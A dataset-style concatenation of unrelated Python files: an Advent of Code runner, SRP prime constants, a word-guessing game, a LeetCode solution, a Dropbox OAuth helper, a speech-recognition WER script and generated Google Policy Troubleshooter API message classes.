for f_in, f_out, w in zip(in_feat, out_feat, self.wgts)]
self.metrics = dict(zip(self.metric_names, self.feat_losses))
return sum(self.feat_losses)
def __del__(self):
self.hooks.remove()
| 2.09375 | 2 |
runner.py | IsaacG/Advent-of-Code | 3 | 12770030 | <filename>runner.py
#!/bin/python3
"""Run AoC code in various flavors."""
import datetime
import importlib
import os
import pathlib
import string
import subprocess
import time
import traceback
from typing import List, Optional
import dotenv
import inotify_simple
import pytz
import typer
from pylib import site
EST = pytz.timezone("EST")
class Runner:
"""Code runner."""
def __init__(self, year: int, day: int, watch: bool, timeout: int):
self.day = day or self.now().day
self.year = year or self.now().year
self.timeout = timeout
self.watch = watch
self.base = pathlib.Path(__file__).parent / str(self.year)
def from_template(self, day: int) -> None:
"""Create a new exercise file from template."""
filename = self.base / f"{day:02}.py"
if filename.exists():
print(f"{filename.name} already exists")
return
template_file = self.base / "tmpl.py"
template = string.Template(template_file.read_text())
out = template.substitute(
day=f"{day:02}",
sample=site.Website(self.year, day).codeblocks(),
)
filename = self.base / f"{day:02}.py"
filename.write_text(out)
filename.chmod(0o700)
def december(self):
"""Run live wait-solve for all of December."""
year = self.now().year
start = datetime.datetime(year, 11, 30, tzinfo=EST)
end = datetime.datetime(year, 12, 25, 1, tzinfo=EST)
while start < self.now() < end:
solved = [int(line.split()[0]) for line in (self.base / "solutions.txt").read_text().splitlines()]
if self.now().day in solved:
print("Wait for tomorrow's problem to start and solve it.")
self.wait_solve()
else:
print("Today's problem is not yet solved. Solve it now.")
self.live_solve()
@staticmethod
def now() -> datetime.datetime:
"""Return datetime now."""
return datetime.datetime.now(pytz.timezone("EST"))
def wait_solve(self):
"""Wait for the clock to tick down then live solve."""
now = self.now()
day = datetime.timedelta(days=1)
midnight = now.replace(hour=0, minute=0, second=0, microsecond=0) + day
delay = midnight - now
print(f"Next exercise starts in {delay.seconds} seconds.")
while midnight > self.now():
time.sleep((midnight - self.now()).seconds + 1)
self.live_solve()
def live_solve(self):
"""Solve a day live.
Build from template, watch for test to pass, submit, repeat, exit.
"""
if not self.day:
day = self.now().day
# Set up the file from template.
self.from_template(day)
# Import once to set up.
module = importlib.import_module(f"{day:02}")
obj = getattr(module, f"Day{day:02}")()
raw_data = obj.raw_data(None)
submitted = {1: False, 2: False}
solutions = {}
part = obj.site().part()
if part is None:
print("It looks like you completed this day.")
self.update_solutions(day)
return
# Watch the file.
inotify = inotify_simple.INotify()
inotify.add_watch(self.base, inotify_simple.flags.CLOSE_WRITE)
while events := inotify.read():
if not any(i.name == f"{day:02}.py" for i in events):
continue
print(datetime.datetime.now().strftime("%H:%M:%S"))
try:
# Reload code and get the Challenge.
module = importlib.reload(module)
obj = getattr(module, f"Day{day:02}")()
puzzle_input = obj.parse_input(raw_data)
# Run tests for this part.
obj.testing = True
tests = [t for t in obj.TESTS if t.part == part and t.want != 0]
if not tests:
print(f"No tests found for part {part}")
continue
tests_pass = True
for case in tests:
assert isinstance(case.inputs, str), "TestCase.inputs must be a string!"
data = obj.parse_input(case.inputs.strip())
got = obj.funcs[case.part](data)
if case.want != got:
print(f"FAILED! {case.part}: want({case.want}) != got({got})")
tests_pass = False
obj.testing = False
# If tests pass, try to submit.
if not tests_pass:
print("Test failed")
continue
if obj.SUBMIT[part] and not submitted[part]:
if answer := obj.funcs[part](puzzle_input):
submitted[part] = True
print("Submitting answer:", answer)
resp = obj.site().submit(answer)
print(f"Response: {resp}")
if "That's the right answer!" in resp:
print(f"Solved part {part}!!")
part += 1
else:
print(f"Incorrect answer for part {part}. You're on your own :(")
break
else:
print("No answer found")
if part == 3:
print("Congrats!")
break
except Exception:
traceback.print_exc()
self.update_solutions(day)
print("Updated Solutions. Watch and run test/check.")
if not solutions:
solutions = {part: obj.funcs[part](puzzle_input) for part in (1, 2)}
stop_at = self.now().replace(hour=4, minute=0, second=0, microsecond=0)
while self.now() < stop_at:
timeout = (stop_at - self.now()).seconds
events = inotify.read(timeout=timeout)
if not any(i.name == f"{day:02}.py" for i in events):
continue
print(datetime.datetime.now().strftime("%H:%M:%S"))
try:
# Reload code and get the Challenge.
module = importlib.reload(module)
obj = getattr(module, f"Day{day:02}")()
puzzle_input = obj.parse_input(raw_data)
# Run tests for this part.
obj.testing = True
tests = [t for t in obj.TESTS if t.want != 0]
for case in tests:
data = obj.parse_input(case.inputs.strip())
got = obj.funcs[case.part](data)
if case.want == got:
print(f"TEST PASSED! {case.part}")
else:
print(f"TEST FAILED! {case.part}: want({case.want}) != got({got})")
obj.testing = False
# If tests pass, try to submit.
for part in (1, 2):
got = obj.funcs[part](puzzle_input)
if solutions[part] == got:
print(f"CHECK PASSED! {part}")
else:
print(f"CHECK FAILED! {part}: want({solutions[part]}) != got({got})")
except Exception:
traceback.print_exc()
print("Done for the day.")
def update_solutions(self, day):
# Reload code and get the Challenge.
module = importlib.import_module(f"{day:02}")
obj = getattr(module, f"Day{day:02}")()
puzzle_input = obj.parse_input(obj.raw_data(None))
solutions = {part: obj.funcs[part](puzzle_input) for part in (1, 2)}
print(solutions)
solution_line = f"{day:02} {solutions[1]} {solutions[2]}\n"
solution_file = self.base / "solutions.txt"
solution_values = solution_file.read_text()
if solution_line not in solution_values:
solution_values += f"{day:02} {solutions[1]} {solutions[2]}\n"
solution_file.write_text(solution_values)
def maybe_watch(self, func):
"""Run the function once or on every CLOSE_WRITE."""
if not self.watch:
return func(self.day)
inotify = inotify_simple.INotify()
inotify.add_watch(self.base, inotify_simple.flags.CLOSE_WRITE)
while events := inotify.read():
if not events[0].name.endswith(".py"):
continue
name = pathlib.Path(events[0].name).stem
if not name.isnumeric():
continue
day = int(pathlib.Path(events[0].name).stem)
print(datetime.datetime.now().strftime("%H:%M:%S"))
func(day)
print("Done.")
def get_days(self, day):
"""Generate the filenames of the py code."""
if day:
day = f"{day:02d}"
for file in sorted(self.base.glob(f"[0-9][0-9].py")):
if day and file.stem != day:
continue
yield file
def run_with_flags(self, flags: List[str]):
"""Run the .py file with a flag and data."""
self.maybe_watch(lambda d: self._run_with_flags(flags, d))
def _run_with_flags(self, flags: List[str], day: Optional[int]):
for file in self.get_days(day):
cmd = [file] + flags
if self.timeout:
if "--time" in flags and self.timeout == 30:
self.timeout = 120
cmd = ["timeout", str(self.timeout)] + cmd
try:
process = subprocess.run(cmd)
except Exception:
traceback.print_exc()
break
if process.returncode == 124:
print("TIMEOUT!")
def main(
day: Optional[int] = None,
waitlive: bool = False,
december: bool = False,
live: bool = False,
test: bool = False,
solve: bool = False,
check: bool = False,
submit: bool = False,
watch: bool = False,
timeit: bool = False,
timeout: int = 30,
year: Optional[int] = None,
):
"""Run the code in some fashion."""
dotenv.load_dotenv()
if year is None and os.getenv("YEAR"):
year = os.getenv("YEAR")
runner = Runner(year, day, watch, timeout)
if december:
return runner.december()
if waitlive:
return runner.wait_solve()
if live:
return runner.live_solve()
flags = []
if test:
flags.append("--test")
if solve:
flags.append("--solve")
if submit:
flags.append("--submit")
if timeit:
flags.append("--time")
if check:
flags.append("--check")
assert flags
return runner.run_with_flags(flags)
if __name__ == "__main__":
typer.run(main)
# vim:ts=2:sw=2:expandtab
| 2.953125 | 3 |
srptools/constants.py | idlesign/srptools | 20 | 12770031 | from __future__ import unicode_literals
import hashlib
HASH_SHA_1 = hashlib.sha1
HASH_SHA_256 = hashlib.sha256
PRIME_1024_GEN = '2'
PRIME_1024 = '''\
EEAF0AB9ADB38DD69C33F80AFA8FC5E86072618775FF3C0B9EA2314C9C256576D674DF74\
96EA81D3383B4813D692C6E0E0D5D8E250B98BE48E495C1D6089DAD15DC7D7B46154D6B6\
CE8EF4AD69B15D4982559B297BCF1885C529F566660E57EC68EDBC3C05726CC02FD4CBF4\
976EAA9AFD5138FE8376435B9FC61D2FC0EB06E3'''
PRIME_1536_GEN = '2'
PRIME_1536 = '''\
9DEF3CAFB939277AB1F12A8617A47BBBDBA51DF499AC4C80BEEEA9614B19CC4D5F4F5F55\
6E27CBDE51C6A94BE4607A291558903BA0D0F84380B655BB9A22E8DCDF028A7CEC67F0D0\
8134B1C8B97989149B609E0BE3BAB63D47548381DBC5B1FC764E3F4B53DD9DA1158BFD3E\
2B9C8CF56EDF019539349627DB2FD53D24B7C48665772E437D6C7F8CE442734AF7CCB7AE\
837C264AE3A9BEB87F8A2FE9B8B5292E5A021FFF5E91479E8CE7A28C2442C6F315180F93\
499A234DCF76E3FED135F9BB'''
PRIME_2048_GEN = '2'
PRIME_2048 = '''\
AC6BDB41324A9A9BF166DE5E1389582FAF72B6651987EE07FC3192943DB56050A37329CB\
B4A099ED8193E0757767A13DD52312AB4B03310DCD7F48A9DA04FD50E8083969EDB767B0\
CF6095179A163AB3661A05FBD5FAAAE82918A9962F0B93B855F97993EC975EEAA80D740A\
DBF4FF747359D041D5C33EA71D281E446B14773BCA97B43A23FB801676BD207A436C6481\
F1D2B9078717461A5B9D32E688F87748544523B524B0D57D5EA77A2775D2ECFA032CFBDB\
F52FB3786160279004E57AE6AF874E7303CE53299CCC041C7BC308D82A5698F3A8D0C382\
71AE35F8E9DBFBB694B5C803D89F7AE435DE236D525F54759B65E372FCD68EF20FA7111F\
9E4AFF73
'''
PRIME_3072_GEN = '5'
PRIME_3072 = '''\
FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA6\
3B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245\
E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F2411\
7C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F\
83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08\
CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9\
DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D\
04507A33A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7\
ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864D8760273\
3EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E208E24FA074E5AB31\
43DB5BFCE0FD108E4B82D120A93AD2CAFFFFFFFFFFFFFFFF'''
PRIME_4096_GEN = '5'
PRIME_4096 = '''\
FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA6\
3B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245\
E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F2411\
7C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F\
83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08\
CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9\
DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D\
04507A33A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7\
ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864D8760273\
3EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E208E24FA074E5AB31\
43DB5BFCE0FD108E4B82D120A92108011A723C12A787E6D788719A10BDBA5B2699C32718\
6AF4E23C1A946834B6150BDA2583E9CA2AD44CE8DBBBC2DB04DE8EF92E8EFC141FBECAA6\
287C59474E6BC05D99B2964FA090C3A2233BA186515BE7ED1F612970CEE2D7AFB81BDD76\
2170481CD0069127D5B05AA993B4EA988D8FDDC186FFB7DC90A6C08F4DF435C934063199\
FFFFFFFFFFFFFFFF'''
PRIME_6144_GEN = '5'
PRIME_6144 = '''\
FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA6\
3B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245\
E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F2411\
7C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F\
83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08\
CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9\
DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D\
04507A33A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7\
ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864D8760273\
3EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E208E24FA074E5AB31\
43DB5BFCE0FD108E4B82D120A92108011A723C12A787E6D788719A10BDBA5B2699C32718\
6AF4E23C1A946834B6150BDA2583E9CA2AD44CE8DBBBC2DB04DE8EF92E8EFC141FBECAA6\
287C59474E6BC05D99B2964FA090C3A2233BA186515BE7ED1F612970CEE2D7AFB81BDD76\
2170481CD0069127D5B05AA993B4EA988D8FDDC186FFB7DC90A6C08F4DF435C934028492\
36C3FAB4D27C7026C1D4DCB2602646DEC9751E763DBA37BDF8FF9406AD9E530EE5DB382F\
413001AEB06A53ED9027D831179727B0865A8918DA3EDBEBCF9B14ED44CE6CBACED4BB1B\
DB7F1447E6CC254B332051512BD7AF426FB8F401378CD2BF5983CA01C64B92ECF032EA15\
D1721D03F482D7CE6E74FEF6D55E702F46980C82B5A84031900B1C9E59E7C97FBEC7E8F3\
23A97A7E36CC88BE0F1D45B7FF585AC54BD407B22B4154AACC8F6D7EBF48E1D814CC5ED2\
0F8037E0A79715EEF29BE32806A1D58BB7C5DA76F550AA3D8A1FBFF0EB19CCB1A313D55C\
DA56C9EC2EF29632387FE8D76E3C0468043E8F663F4860EE12BF2D5B0B7474D6E694F91E\
6DCC4024FFFFFFFFFFFFFFFF'''
| 1.5625 | 2 |
jogo-adivinhacao.py | engvinicius/estudos | 2 | 12770032 | #!/usr/bin/env python
#
# Um simples jogo de adivinhação com dicas.
#
# <NAME>
# @VinihJunior
# <EMAIL>
from random import randint
while True:
print("************************************************")
print("* *")
print("* Adivinhe qual é o ANIMAL \o/ *")
print("* *")
print("************************************************")
print("\nDescubra qual é o animal: ")
lista_principal = []
lista_animais = open("lista-animais.txt")
lista = (lista_animais.read() )
lista = lista.split()
for line in lista:
line = line.lower()
lista_principal.append(line)
lista_animais.close()
end = len(lista_principal)
secret = randint(0, end - 1)
animal = (lista_principal[secret])
comp = len(animal)
print(animal)
print("\n* Que tem", (comp - 1), "letras \n",
"\n* E começa com a letra", animal[0], "\n")
resp = input("\n* Digite sua resposta: ")
if resp == animal: # compara a resposta com o nome sorteado.
print("\nVocê ACERTOU!! \o/ é", animal, "\n")
voltar = input("Deseja jogar novamente? (y/n): ")
if voltar not in ("y" or "Y"):
break
else:
print("\nVocê errou :(\n")
voltar = input("Deseja jogar novamente? (y/n): ")
if voltar not in ("y" or "Y"):
break
| 4 | 4 |
Leetcode/0945. Minimum Increment to Make Array Unique/0945.py | Next-Gen-UI/Code-Dynamics | 0 | 12770033 | <filename>Leetcode/0945. Minimum Increment to Make Array Unique/0945.py
class Solution:
def minIncrementForUnique(self, A: List[int]) -> int:
ans = 0
minAvailable = 0
A.sort()
for a in A:
ans += max(minAvailable - a, 0)
minAvailable = max(minAvailable, a) + 1
return ans
| 3.234375 | 3 |
papergit/dropbox.py | jameshruby/paper-to-git | 78 | 12770034 | <reponame>jameshruby/paper-to-git
import dropbox
from dropbox import DropboxOAuth2FlowNoRedirect
from papergit.config import config
class Dropbox:
"""
The base dropbox class to access.
"""
def __init__(self):
self.dbx = None
def initialize(self):
assert config.initialized
self.dbx = dropbox.Dropbox(self.get_auth_token())
def get_old_auth_token(self):
# Check if the OAuth Flow has been performed before and thus doesn't
# need to be done again. If yes, return the auth_token
token = getattr(config.dropbox, 'api_token')
return None if token == '' else token
def get_auth_token(self):
old_token = self.get_old_auth_token()
if old_token is None:
# This means that we don't have the authentication token, so run the
# entire workflow again to get the auth token.
return self.get_new_auth_token()
# If not none, just return the old Auth Token
return old_token
def get_new_auth_token(self):
# Run the dropbox OAuth Flow to get the user's OAuth Token.
auth_flow = DropboxOAuth2FlowNoRedirect(config.dropbox.app_key,
config.dropbox.app_secret)
authorize_url = auth_flow.start()
print("1. Go to: " + authorize_url)
print("2. Click \"Allow\" (you might have to log in first).")
print("3. Copy the authorization code.")
auth_code = input("Enter the authorization code here: ").strip()
try:
oauth_result = auth_flow.finish(auth_code)
except Exception as e:
print('Error: %s' % (e,))
return
config.write_to_user_config('dropbox', 'api_token',
oauth_result.access_token)
return oauth_result.access_token
def initialize():
dbox = Dropbox()
dbox.initialize()
config.dbox = dbox
| 3.453125 | 3 |
wer_computation.py | Skfreak/ASR_Project_1 | 0 | 12770035 |
# importing necessary packages
import pandas as pd
import numpy as np
from sklearn.preprocessing import LabelEncoder
from sklearn.metrics import accuracy_score, precision_score, recall_score, f1_score, confusion_matrix
from sklearn.externals import joblib
from sklearn.preprocessing import StandardScaler
import os
import argparse
# command line arguments
parser = argparse.ArgumentParser()
# argument for delta
parser.add_argument('--delta', type=int, default=0, help='Value of delta while computing mfcc features')
# argument for components
parser.add_argument('--components', type = int, default = 4, help = 'How much number of components')
# arguement for energy coefficient
parser.add_argument('--coefficient', type = str, default = 'Yes', help = 'Enter False to not take energy coefficients')
args = parser.parse_args()
# delta value
delta = args.delta
# Number of components
components = args.components
# Coefficient
if(args.coefficient == 'Yes'):
coefficient = True
else:
coefficient = False
print("Delta is: ", delta)
print("Number of components are: ", components)
print("Energy coefficients are included: ", coefficient)
# loading encoder and Scaler
if(coefficient == True):
file_scalar = ("./Scalar/delta_" + str(delta) + "_with_coefficients_" + ".pkl")
print(True)
else:
file_scalar = ("./Scalar/delta_" + str(delta) + "_without_coefficients_" + ".pkl")
file_encoder = ("./labelEncoder/delta_" + str(delta) + "" + ".pkl")
# Load scalar and label encoder objects
scaler = joblib.load(file_scalar)
lb = joblib.load(file_encoder)
# Load data file
timit_testdf = pd.read_hdf("./features_for_PER/timit_test_delta_" + str(delta) + ".hdf")
print("Test data loaded")
# encoding labels
timit_testdf['labels_lb'] = lb.transform(timit_testdf['labels'])
# Take features and label encoded labels
test = timit_testdf.copy()
test = test[['features', 'labels_lb', 'id']]
# Get unique phonemes
unique_labels = np.unique(test.labels_lb)
# print("unique labels are: ", unique_labels)
# Get test feature set
features_test = np.array(test['features'].tolist())
# Filter the co-efficients based on energy coefficients inclusion
if(coefficient == False):
if(delta == 0):
features_test = features_test[:,1:]
elif(delta == 1):
features_test = np.delete(features_test,[0, 13], axis = 1)
else:
features_test = np.delete(features_test, [0, 13, 26], axis = 1)
# print('features shape' + str(features_test.shape))
# Make predictions
for i in unique_labels:
if(coefficient == True):
directory = "./models_updated/delta_" + str(delta) + "_with_energy_coefficients" + "/" + str(components)
else:
directory = "./models_updated/delta_" + str(delta) + "_without_energy_coefficients" + "/" + str(components)
if not os.path.exists(directory):
os.makedirs(directory)
filename = directory + "/" + str(i) + ".pkl"
model = joblib.load(filename)
log_prob = model.score_samples(scaler.transform(features_test))
col_name = str(i)
test[col_name] = log_prob
# Get predictions by using argmax
result = test.copy()
result = result.drop(['features', 'labels_lb', 'id'], axis = 1)
# Make predictions
test['predict'] = (result.idxmax(axis = 1))
test['predict'] = test['predict'].astype(int)
# Make groundtruth and prediction files
final = test.copy()
final = final[['id', 'labels_lb', 'predict']]
# final.head()
final.id = final.id.astype(str)
final.id = "sent_" + (final.id)
# final.head()
uniqueid = np.unique(final.id)
# uniqueid
# File for storing ground truth labels
gt = open("./files_for_WER_computation/groundTruth/groundTruth.txt", "w")
# File for storing predicted labels
pred = open("./files_for_WER_computation/predicted/predict_delta_" + str(delta) + "_components_" + str(components) + "_coefficient_" + str(coefficient) + ".txt", "w")
for i in uniqueid:
# print("sentence id is: ", i)
df = final[final.id==i]
gt.write(str(i))
pred.write(str(i))
for j in df.index.values:
gt.write(" " + str(df.labels_lb[j]))
pred.write(" " + str(df.predict[j]))
gt.write("\n")
pred.write("\n")
gt.close()
pred.close()
| 2.578125 | 3 |
lib/googlecloudsdk/third_party/apis/policytroubleshooter/v1beta/policytroubleshooter_v1beta_messages.py | google-cloud-sdk-unofficial/google-cloud-sdk | 2 | 12770036 | <filename>lib/googlecloudsdk/third_party/apis/policytroubleshooter/v1beta/policytroubleshooter_v1beta_messages.py<gh_stars>1-10
"""Generated message classes for policytroubleshooter version v1beta.
"""
# NOTE: This file is autogenerated and should not be edited by hand.
from __future__ import absolute_import
from apitools.base.protorpclite import messages as _messages
from apitools.base.py import encoding
package = 'policytroubleshooter'
class GoogleCloudPolicytroubleshooterV1betaAccessTuple(_messages.Message):
r"""Information about the member, resource, and permission to check.
Fields:
fullResourceName: Required. The full resource name that identifies the
resource. For example, `//compute.googleapis.com/projects/my-
project/zones/us-central1-a/instances/my-instance`. For examples of full
resource names for Google Cloud services, see
https://cloud.google.com/iam/help/troubleshooter/full-resource-names.
permission: Required. The IAM permission to check for the specified member
and resource. For a complete list of IAM permissions, see
https://cloud.google.com/iam/help/permissions/reference. For a complete
list of predefined IAM roles and the permissions in each role, see
https://cloud.google.com/iam/help/roles/reference.
principal: Required. The member, or principal, whose access you want to
check, in the form of the email address that represents that member. For
example, `<EMAIL>` or `my-service-account@my-
project.<EMAIL>`. The member must be a Google Account or
a service account. Other types of members are not supported.
"""
fullResourceName = _messages.StringField(1)
permission = _messages.StringField(2)
principal = _messages.StringField(3)
class GoogleCloudPolicytroubleshooterV1betaBindingExplanation(_messages.Message):
r"""Details about how a binding in a policy affects a member's ability to
use a permission.
Enums:
AccessValueValuesEnum: Indicates whether _this binding_ provides the
specified permission to the specified member for the specified resource.
This field does _not_ indicate whether the member actually has the
permission for the resource. There might be another binding that
overrides this binding. To determine whether the member actually has the
permission, use the `access` field in the TroubleshootIamPolicyResponse.
RelevanceValueValuesEnum: The relevance of this binding to the overall
determination for the entire policy.
RolePermissionValueValuesEnum: Indicates whether the role granted by this
binding contains the specified permission.
RolePermissionRelevanceValueValuesEnum: The relevance of the permission's
existence, or nonexistence, in the role to the overall determination for
the entire policy.
Messages:
MembershipsValue: Indicates whether each member in the binding includes
the member specified in the request, either directly or indirectly. Each
key identifies a member in the binding, and each value indicates whether
the member in the binding includes the member in the request. For
example, suppose that a binding includes the following members: *
`user:<EMAIL>` * `group:<EMAIL>` You want to
troubleshoot access for `user:<EMAIL>`. This user is a member of
the group `group:<EMAIL>`. For the first member in the
binding, the key is `user:<EMAIL>`, and the `membership` field
in the value is set to `MEMBERSHIP_NOT_INCLUDED`. For the second member
in the binding, the key is `group:<EMAIL>`, and the
`membership` field in the value is set to `MEMBERSHIP_INCLUDED`.
Fields:
access: Indicates whether _this binding_ provides the specified permission
to the specified member for the specified resource. This field does
_not_ indicate whether the member actually has the permission for the
resource. There might be another binding that overrides this binding. To
determine whether the member actually has the permission, use the
`access` field in the TroubleshootIamPolicyResponse.
condition: A condition expression that prevents access unless the
expression evaluates to `true`. To learn about IAM Conditions, see
https://cloud.google.com/iam/help/conditions/overview.
memberships: Indicates whether each member in the binding includes the
member specified in the request, either directly or indirectly. Each key
identifies a member in the binding, and each value indicates whether the
member in the binding includes the member in the request. For example,
suppose that a binding includes the following members: *
`user:<EMAIL>` * `group:<EMAIL>` You want to
troubleshoot access for `user:<EMAIL>`. This user is a member of
the group `group:<EMAIL>`. For the first member in the
binding, the key is `user:<EMAIL>`, and the `membership` field
in the value is set to `MEMBERSHIP_NOT_INCLUDED`. For the second member
in the binding, the key is `group:<EMAIL>-eng<EMAIL>`, and the
`membership` field in the value is set to `MEMBERSHIP_INCLUDED`.
relevance: The relevance of this binding to the overall determination for
the entire policy.
role: The role that this binding grants. For example,
`roles/compute.serviceAgent`. For a complete list of predefined IAM
roles, as well as the permissions in each role, see
https://cloud.google.com/iam/help/roles/reference.
rolePermission: Indicates whether the role granted by this binding
contains the specified permission.
rolePermissionRelevance: The relevance of the permission's existence, or
nonexistence, in the role to the overall determination for the entire
policy.
"""
class AccessValueValuesEnum(_messages.Enum):
r"""Indicates whether _this binding_ provides the specified permission to
the specified member for the specified resource. This field does _not_
indicate whether the member actually has the permission for the resource.
There might be another binding that overrides this binding. To determine
whether the member actually has the permission, use the `access` field in
the TroubleshootIamPolicyResponse.
Values:
ACCESS_STATE_UNSPECIFIED: Reserved for future use.
GRANTED: The member has the permission.
NOT_GRANTED: The member does not have the permission.
UNKNOWN_CONDITIONAL: The member has the permission only if a condition
expression evaluates to `true`.
UNKNOWN_INFO_DENIED: The sender of the request does not have access to
all of the policies that Policy Troubleshooter needs to evaluate.
"""
ACCESS_STATE_UNSPECIFIED = 0
GRANTED = 1
NOT_GRANTED = 2
UNKNOWN_CONDITIONAL = 3
UNKNOWN_INFO_DENIED = 4
class RelevanceValueValuesEnum(_messages.Enum):
r"""The relevance of this binding to the overall determination for the
entire policy.
Values:
HEURISTIC_RELEVANCE_UNSPECIFIED: Reserved for future use.
NORMAL: The data point has a limited effect on the result. Changing the
data point is unlikely to affect the overall determination.
HIGH: The data point has a strong effect on the result. Changing the
data point is likely to affect the overall determination.
"""
HEURISTIC_RELEVANCE_UNSPECIFIED = 0
NORMAL = 1
HIGH = 2
class RolePermissionRelevanceValueValuesEnum(_messages.Enum):
r"""The relevance of the permission's existence, or nonexistence, in the
role to the overall determination for the entire policy.
Values:
HEURISTIC_RELEVANCE_UNSPECIFIED: Reserved for future use.
NORMAL: The data point has a limited effect on the result. Changing the
data point is unlikely to affect the overall determination.
HIGH: The data point has a strong effect on the result. Changing the
data point is likely to affect the overall determination.
"""
HEURISTIC_RELEVANCE_UNSPECIFIED = 0
NORMAL = 1
HIGH = 2
class RolePermissionValueValuesEnum(_messages.Enum):
r"""Indicates whether the role granted by this binding contains the
specified permission.
Values:
ROLE_PERMISSION_UNSPECIFIED: Reserved for future use.
ROLE_PERMISSION_INCLUDED: The permission is included in the role.
ROLE_PERMISSION_NOT_INCLUDED: The permission is not included in the
role.
ROLE_PERMISSION_UNKNOWN_INFO_DENIED: The sender of the request is not
allowed to access the binding.
"""
ROLE_PERMISSION_UNSPECIFIED = 0
ROLE_PERMISSION_INCLUDED = 1
ROLE_PERMISSION_NOT_INCLUDED = 2
ROLE_PERMISSION_UNKNOWN_INFO_DENIED = 3
@encoding.MapUnrecognizedFields('additionalProperties')
class MembershipsValue(_messages.Message):
r"""Indicates whether each member in the binding includes the member
specified in the request, either directly or indirectly. Each key
identifies a member in the binding, and each value indicates whether the
member in the binding includes the member in the request. For example,
suppose that a binding includes the following members: *
`user:<EMAIL>` * `group:<EMAIL>` You want to
troubleshoot access for `user:<EMAIL>`. This user is a member of
the group `group:<EMAIL>`. For the first member in the
binding, the key is `user:<EMAIL>`, and the `membership` field
in the value is set to `MEMBERSHIP_NOT_INCLUDED`. For the second member in
the binding, the key is `group:<EMAIL>`, and the
`membership` field in the value is set to `MEMBERSHIP_INCLUDED`.
Messages:
AdditionalProperty: An additional property for a MembershipsValue
object.
Fields:
additionalProperties: Additional properties of type MembershipsValue
"""
class AdditionalProperty(_messages.Message):
r"""An additional property for a MembershipsValue object.
Fields:
key: Name of the additional property.
value: A GoogleCloudPolicytroubleshooterV1betaBindingExplanationAnnota
tedMembership attribute.
"""
key = _messages.StringField(1)
value = _messages.MessageField('GoogleCloudPolicytroubleshooterV1betaBindingExplanationAnnotatedMembership', 2)
additionalProperties = _messages.MessageField('AdditionalProperty', 1, repeated=True)
access = _messages.EnumField('AccessValueValuesEnum', 1)
condition = _messages.MessageField('GoogleTypeExpr', 2)
memberships = _messages.MessageField('MembershipsValue', 3)
relevance = _messages.EnumField('RelevanceValueValuesEnum', 4)
role = _messages.StringField(5)
rolePermission = _messages.EnumField('RolePermissionValueValuesEnum', 6)
rolePermissionRelevance = _messages.EnumField('RolePermissionRelevanceValueValuesEnum', 7)
class GoogleCloudPolicytroubleshooterV1betaBindingExplanationAnnotatedMembership(_messages.Message):
r"""Details about whether the binding includes the member.
Enums:
MembershipValueValuesEnum: Indicates whether the binding includes the
member.
RelevanceValueValuesEnum: The relevance of the member's status to the
overall determination for the binding.
Fields:
membership: Indicates whether the binding includes the member.
relevance: The relevance of the member's status to the overall
determination for the binding.
"""
class MembershipValueValuesEnum(_messages.Enum):
r"""Indicates whether the binding includes the member.
Values:
MEMBERSHIP_UNSPECIFIED: Reserved for future use.
MEMBERSHIP_INCLUDED: The binding includes the member. The member can be
included directly or indirectly. For example: * A member is included
directly if that member is listed in the binding. * A member is
included indirectly if that member is in a Google group or G Suite
domain that is listed in the binding.
MEMBERSHIP_NOT_INCLUDED: The binding does not include the member.
MEMBERSHIP_UNKNOWN_INFO_DENIED: The sender of the request is not allowed
to access the binding.
MEMBERSHIP_UNKNOWN_UNSUPPORTED: The member is an unsupported type. Only
Google Accounts and service accounts are supported.
"""
MEMBERSHIP_UNSPECIFIED = 0
MEMBERSHIP_INCLUDED = 1
MEMBERSHIP_NOT_INCLUDED = 2
MEMBERSHIP_UNKNOWN_INFO_DENIED = 3
MEMBERSHIP_UNKNOWN_UNSUPPORTED = 4
class RelevanceValueValuesEnum(_messages.Enum):
r"""The relevance of the member's status to the overall determination for
the binding.
Values:
HEURISTIC_RELEVANCE_UNSPECIFIED: Reserved for future use.
NORMAL: The data point has a limited effect on the result. Changing the
data point is unlikely to affect the overall determination.
HIGH: The data point has a strong effect on the result. Changing the
data point is likely to affect the overall determination.
"""
